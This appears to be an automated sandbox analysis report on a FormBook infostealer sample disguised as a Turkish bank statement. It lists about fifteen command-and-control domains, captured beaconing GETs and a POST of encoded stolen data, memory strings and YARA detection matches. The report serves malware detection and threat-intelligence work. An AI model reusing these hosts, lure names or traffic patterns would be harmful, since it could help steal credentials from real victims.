h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margi
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sat, 18 Feb 2023 12:08:27 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 9X-Rate-Limit-Reset: 2023-02-18T12:08:32.1801576Z
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sat, 18 Feb 2023 12:08:29 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 8X-Rate-Limit-Reset: 2023-02-18T12:08:32.1801576Z
          Source: explorer.exe, 00000003.00000002.793176808.0000000015E36000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000009.00000002.781464494.0000000005C26000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://assilajamiart.com/ghii/?9WI6t=QaRcz&Y5=x6cX7RROW6e4Kl6qDixAJj/39fAIdeIU2pDNPD9GdPymkj2OdO8FRH
          Source: explorer.exe, 00000003.00000002.793176808.0000000015B12000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000009.00000002.781464494.0000000005902000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 00000009.00000002.782054035.0000000006EF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://img.sedoparking.com
          Source: explorer.exe, 00000003.00000002.793176808.0000000015980000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000009.00000002.781464494.0000000005770000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://ladybillplanet.com/ghii/?Y5=nNwsU5RDSztrDyxRHILLs79A8ojzBVjbvYOj2DqB/Q3esj8ZmeFlGSz1p8lC
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.7dkjhk.com
          Source: explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.7dkjhk.com/ghii/
          Source: explorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.assilajamiart.com
          Source: explorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.assilajamiart.com/ghii/
          Source: explorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bemmulher.online
          Source: explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bemmulher.online/ghii/
          Source: explorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cutgang.net
          Source: rundll32.exe, 00000009.00000002.779126189.0000000000BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cutgang.net/
          Source: explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cutgang.net/ghii/
          Source: rundll32.exe, 00000009.00000002.779126189.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.782159260.0000000007232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cutgang.net/ghii/?Y5=ZjEpLe7oxQ70uLnf6hiyuc6pu0EMckSA0PTIEH8mULBl4PD4NIfksCJCZa9jgfqw8h
          Source: explorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.de-nagel.com
          Source: explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.de-nagel.com/ghii/
          Source: explorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.de-nagel.comH
          Source: explorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.energybig.xyz
          Source: explorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.energybig.xyz/ghii/
          Source: explorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fluxgreenn.space
          Source: explorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fluxgreenn.space/ghii/
          Source: explorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.genuineinsights.cloud
          Source: explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.genuineinsights.cloud/ghii/
          Source: explorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hubyazilim.com
          Source: explorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hubyazilim.com/ghii/
          Source: explorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.789387698.000000000B764000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ixirwholesale.xyz
          Source: explorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.789387698.000000000B764000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ixirwholesale.xyz/ghii/
          Source: explorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ladybillplanet.com
          Source: explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ladybillplanet.com/ghii/
          Source: explorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nortonseecurity.com
          Source: explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nortonseecurity.com/ghii/
          Source: explorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.octohoki.net
          Source: explorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.octohoki.net/ghii/
          Source: explorer.exe, 00000003.00000002.793176808.000000001565C000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000009.00000002.781464494.000000000544C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.searchvity.com/
          Source: explorer.exe, 00000003.00000002.793176808.000000001565C000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000009.00000002.781464494.000000000544C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.searchvity.com/?dn=
          Source: explorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sem-jobs.com
          Source: explorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sem-jobs.com/ghii/
          Source: explorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wenzid4.top
          Source: explorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wenzid4.top/ghii/
          Source: explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yeah-go.com
          Source: explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yeah-go.com/ghii/
          Source: -912K03JO.9.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: -912K03JO.9.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: -912K03JO.9.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: rundll32.exe, 00000009.00000003.342891764.000000000721E000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.9.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: -912K03JO.9.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: explorer.exe, 00000003.00000002.793176808.00000000154CA000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000009.00000002.781464494.00000000052BA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Montserrat:200
          Source: rundll32.exe, 00000009.00000003.342891764.000000000721E000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.9.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: rundll32.exe, 00000009.00000003.342891764.000000000721E000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.9.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: rundll32.exe, 00000009.00000003.342891764.000000000721E000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.9.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: rundll32.exe, 00000009.00000003.342891764.000000000721E000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.9.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: rundll32.exe, 00000009.00000003.342891764.000000000721E000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.9.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: explorer.exe, 00000003.00000002.793176808.0000000015B12000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000009.00000002.781464494.0000000005902000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 00000009.00000002.782054035.0000000006EF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
          Source: rundll32.exe, 00000009.00000002.782054035.0000000006EF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.tucowsdomains.com/
          Source: unknownHTTP traffic detected: POST /ghii/ HTTP/1.1Host: www.energybig.xyzConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.energybig.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.energybig.xyz/ghii/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 59 35 3d 4b 75 47 55 64 7a 32 39 51 61 76 34 54 6a 52 59 70 51 55 4d 57 62 6d 6d 78 61 4d 6b 79 5f 39 55 4e 6c 47 4b 61 56 4c 4b 45 49 63 36 6f 61 33 38 41 59 4f 7a 63 75 63 4f 67 76 50 7a 63 6a 32 59 63 59 75 70 38 5f 51 4d 71 55 61 38 69 69 71 32 38 63 37 5a 75 59 45 6c 68 79 38 6f 30 4f 39 71 50 67 4b 52 43 6c 57 50 30 65 39 31 6f 2d 6a 4c 48 4f 6c 4d 6d 79 41 46 70 56 46 6b 35 37 6b 5f 63 56 30 79 57 41 48 53 4d 39 63 35 69 59 46 42 54 43 61 63 43 4a 41 71 76 56 47 2d 57 30 44 34 78 6a 52 53 45 62 65 4d 65 65 5a 4f 44 76 36 55 55 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: Y5=KuGUdz29Qav4TjRYpQUMWbmmxaMky_9UNlGKaVLKEIc6oa38AYOzcucOgvPzcj2YcYup8_QMqUa8iiq28c7ZuYElhy8o0O9qPgKRClWP0e91o-jLHOlMmyAFpVFk57k_cV0yWAHSM9c5iYFBTCacCJAqvVG-W0D4xjRSEbeMeeZODv6UUA).
          Source: unknownDNS traffic detected: queries for: www.wenzid4.top
          Source: global trafficHTTP traffic detected: GET /ghii/?9WI6t=QaRcz&Y5=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF6AjHy/cvLKIMIEQ== HTTP/1.1Host: www.wenzid4.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?9WI6t=QaRcz&Y5=Hsu0eFbPaPXvQj1driY9Qb+UxIEGydZDMi24Zx/KBNJzrILAD6eOCtsvvO79CgG5LYmF38wKy0LUujLv+r7tqZV/rA0yzrxWEg== HTTP/1.1Host: www.energybig.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?Y5=b9pmEiWE3A9hICRLJ48/0GIWTdcguNEQkRUuEoMGZR2jfpcIS7+82C+h9uoa2hbDMoucG0FStkg6AqIGzw0t5S24GXeXAGyBig==&9WI6t=QaRcz HTTP/1.1Host: www.genuineinsights.cloudConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?9WI6t=QaRcz&Y5=mbPzPtZ0Er8L5pad82wwGh9ocqcT3a4VC5lEcjpUbblZCC9rEfNiJ4Zzn4lMJLJJ2TaA1od8FsE8LCEUSFIlepjy8LvksxZfxg== HTTP/1.1Host: www.octohoki.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?Y5=nNwsU5RDSztrDyxRHILLs79A8ojzBVjbvYOj2DqB/Q3esj8ZmeFlGSz1p8lC+bcuH8jypYjqHnnMah8No3XpEKoXZLS1zEAfoQ==&9WI6t=QaRcz HTTP/1.1Host: www.ladybillplanet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?9WI6t=QaRcz&Y5=2K2NHyQWu2C8/rgVX1vHKTtef6ApytgwLa2EVVkQrb8caG7fKJiILTd9UXVvcQ44mr4Jwpyj4o8MhJQLFkVmLr55BQQOA1kU8g== HTTP/1.1Host: www.hubyazilim.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?Y5=el6O6QfXWJC5IcEqY7ajPQM3AxnGZ5wjtYFmnAPhTiUm5LiBD7pHZMMmJ3xfiSpQzup0R7I9jNpZRQ1DLLwlO2x3KZLMqqyEgg==&9WI6t=QaRcz HTTP/1.1Host: www.7dkjhk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?9WI6t=QaRcz&Y5=x6cX7RROW6e4Kl6qDixAJj/39fAIdeIU2pDNPD9GdPymkj2OdO8FRH6QHxBezwh0VT5YfLMIY+0KdzPIu3ty6XebiauUbAvcGQ== HTTP/1.1Host: www.assilajamiart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?9WI6t=QaRcz&Y5=s7qY3xXjkC1/TbWEYc6+5vkm1XLSScFCKWQ5egwgnE5ocsyGKPoCuhR72/pzoQfhJiIIuERBZ9Gt0DxnImXC1vT81iEZuqsQmQ== HTTP/1.1Host: www.sem-jobs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?Y5=bNlPHlhETrwE0CBUTa4Ov0f9IitGRas8007S+k/uRSIn2M4XJq0O4GAgtFn3DdbLFzy6ewAkUq9t07yJukgh3h16R0bz/1ZGgA==&9WI6t=QaRcz HTTP/1.1Host: www.yeah-go.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?9WI6t=QaRcz&Y5=enp1wJFMKovuqeDSVBmhA9iAASWLcNg6GTmIWmQ4dRXJlG5bG6sZRd0dvjz4e+WtF/EhWz7+kVVc2T5W4ldDnU48esvciaNoGQ== HTTP/1.1Host: www.ixirwholesale.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?9WI6t=QaRcz&Y5=enp1wJFMKovuqeDSVBmhA9iAASWLcNg6GTmIWmQ4dRXJlG5bG6sZRd0dvjz4e+WtF/EhWz7+kVVc2T5W4ldDnU48esvciaNoGQ== HTTP/1.1Host: www.ixirwholesale.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?9WI6t=QaRcz&Y5=enp1wJFMKovuqeDSVBmhA9iAASWLcNg6GTmIWmQ4dRXJlG5bG6sZRd0dvjz4e+WtF/EhWz7+kVVc2T5W4ldDnU48esvciaNoGQ== HTTP/1.1Host: www.ixirwholesale.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?9WI6t=QaRcz&Y5=enp1wJFMKovuqeDSVBmhA9iAASWLcNg6GTmIWmQ4dRXJlG5bG6sZRd0dvjz4e+WtF/EhWz7+kVVc2T5W4ldDnU48esvciaNoGQ== HTTP/1.1Host: www.ixirwholesale.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?9WI6t=QaRcz&Y5=enp1wJFMKovuqeDSVBmhA9iAASWLcNg6GTmIWmQ4dRXJlG5bG6sZRd0dvjz4e+WtF/EhWz7+kVVc2T5W4ldDnU48esvciaNoGQ== HTTP/1.1Host: www.ixirwholesale.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?9WI6t=QaRcz&Y5=enp1wJFMKovuqeDSVBmhA9iAASWLcNg6GTmIWmQ4dRXJlG5bG6sZRd0dvjz4e+WtF/EhWz7+kVVc2T5W4ldDnU48esvciaNoGQ== HTTP/1.1Host: www.ixirwholesale.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?9WI6t=QaRcz&Y5=enp1wJFMKovuqeDSVBmhA9iAASWLcNg6GTmIWmQ4dRXJlG5bG6sZRd0dvjz4e+WtF/EhWz7+kVVc2T5W4ldDnU48esvciaNoGQ== HTTP/1.1Host: www.ixirwholesale.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?9WI6t=QaRcz&Y5=enp1wJFMKovuqeDSVBmhA9iAASWLcNg6GTmIWmQ4dRXJlG5bG6sZRd0dvjz4e+WtF/EhWz7+kVVc2T5W4ldDnU48esvciaNoGQ== HTTP/1.1Host: www.ixirwholesale.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?9WI6t=QaRcz&Y5=enp1wJFMKovuqeDSVBmhA9iAASWLcNg6GTmIWmQ4dRXJlG5bG6sZRd0dvjz4e+WtF/EhWz7+kVVc2T5W4ldDnU48esvciaNoGQ== HTTP/1.1Host: www.ixirwholesale.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: cmezd.exe, 00000001.00000002.263335219.000000000098A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405809

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.cmezd.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.cmezd.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.778621822.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.302378649.0000000001310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.778103844.0000000000830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.778853433.0000000000A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.302265970.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.301544230.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 2.2.cmezd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.cmezd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.cmezd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.cmezd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.778621822.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.778621822.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.302378649.0000000001310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.302378649.0000000001310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.778103844.0000000000830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.778103844.0000000000830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.778853433.0000000000A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.778853433.0000000000A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.302265970.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.302265970.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.301544230.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.301544230.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 2.2.cmezd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
